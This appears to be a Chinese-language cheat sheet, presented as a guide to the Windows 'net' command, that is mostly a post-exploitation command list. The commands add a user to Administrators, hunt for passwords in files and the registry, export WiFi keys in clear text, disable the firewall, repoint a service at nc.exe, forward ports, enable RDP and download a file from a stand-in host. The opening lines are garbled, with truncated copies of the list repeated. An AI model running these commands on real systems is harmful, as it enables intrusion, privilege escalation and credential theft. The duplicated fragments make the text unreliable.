Windows命令中net命令的常用用法
查看共享连接net use增加远程共享net use \host /u:user pass查看域中当前的主机列表net view /domain查看当前域中的用户net user /domain增加一个本地用户net user user pass /add将新增的用户加到本地管理员组net localgroup "Administrators" user /add查看域中的密码策略net acco
查看共享连接net use增加远程共享net use \host /u:user pass查看域中当前的主机列表net view /domain查看当前域中的用户net user /domain增加一个本地用户net user user pass /add将新增的用户加到本地管理员组net localgroup "Administrators" user /add查看域中的密码策略net accounts /domain查看本地组net localgroup "Group"查看域中的组信息net group /domain查看域中指定组的成员net group "Domain group" /
net use 增加远程共享 net use \host /u:user pass 查看域中当前的主机列表 net view /domain 查看当前域中的用户 net user /domain 增加一个本地用户 net user user pass /add 将新增的用户加到本地管理员组 net localgroup "Administrators" user /add 查看域中的密码策略 net accounts /domain 查看本地组 net localgroup "Group" 查看域中的组信息 net group /domain 查看域中指定组的成员 net group "Domain group" /domain 查看当前机器所在的域名 net config workstation 查看当前服务器所在的域名 net config server 显示系统信息 systeminfo 查看远程主机的系统信息 systeminfo /S ip /U domain\user /P Pwd 显示进程和服务信息 tasklist /svc 显示所有进程以及DLL信息 tasklist /m 显示进程和所有者 tasklist /v 查看远程主机的进程列表 tasklist /S ip /v 搜索所有 pdf 文件 dir /a /s /b c:\'.pdf' 显示服务信息 sc query 显示具体的服务信息(包括二进制路径和运行使用) sc qc Spooler 找出文件名字包含 password 的文件 findstr /si 'password' .txt 搜索敏感文件名称 dir /s *pass* == *cred* == *vnc* == *.config* 更改服务的二进制路径 sc config upnphost binpath= "C:\nc.exe" 修改系统服务的权限 sc config upnphost obj= ".\LocalSystem" password= "" 检查系统服务的权限 accesschk.exe -ucqv "Authenticated Users" * /accepteula 检查指定服务的权限 accesschk.exe -ucqv ServceName /accepteula 检查指定组在指定目录下的写权限 accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula 打印路由表 route print 保存当前主机上的所有WiFi信息 netsh wlan export profile folder=. key=clear 设置当前配置禁用防火墙 netsh advfirewall set currentprofile state off 设置端口转发 netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2 启用远程访问 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 启用远程协助 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f 修改远程访问端口 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 12345 /f 查找注册表中的密码 reg query HKLM /f password /t REG_SZ /s 查询 winlogon 信息 reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" 下载文件 powershell -c "(new-object System.Net.WebClient).DownloadFile('http://blabla.com/test.txt','C:\Users\admin\Desktop\test.test')" 列出运行的服务 Get-Service I where object {$ .status -eq ''Running''} 1、切换到 .NET 目录 cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (或者 .NET 的对应版本的目录) 2、编译 x86 版本 csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:<out_file_name> /platform:x86 "/cs/files/dir/*.cs" 3、编译 x64 版本 csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:<out_file_name> /platform:x64 "/cs/files/dir/*.cs"
查看共享连接系统信息相关命令
网络信息
开启远程访问
注册表操作
使用 powershell
编译 C# 代码
